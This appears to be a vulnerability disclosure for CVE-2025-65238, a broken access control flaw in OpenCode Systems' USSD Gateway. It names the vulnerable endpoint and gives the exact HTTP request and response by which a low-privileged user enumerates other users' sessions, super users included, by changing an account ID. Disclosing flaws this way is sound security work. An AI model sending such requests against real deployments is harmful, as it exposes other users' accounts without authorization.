# \[CVE-2025-65238] USSD Gateway Broken Access Control - Sessions

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who low privileged access to enumerate all the application sessions. \
<https://www.cve.org/CVERecord?id=CVE-2025-65238>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint:** `/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider`

## Exploitation

The vulnerability allows the low privileged user to enumerate the user sessions by inserting the account ID of the user.&#x20;

From the low privileged user, the exploitation can be done by using the below request

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]

account_id=33
```

```http
HTTP/2 200 OK
Date: XXX, XX XXX 2025 xx:xx:xx GMT
[...]

{"10":"REDACTED-USERNAME"}
```

Additionally you can enumerate different user like a super user by changing the user ID.&#x20;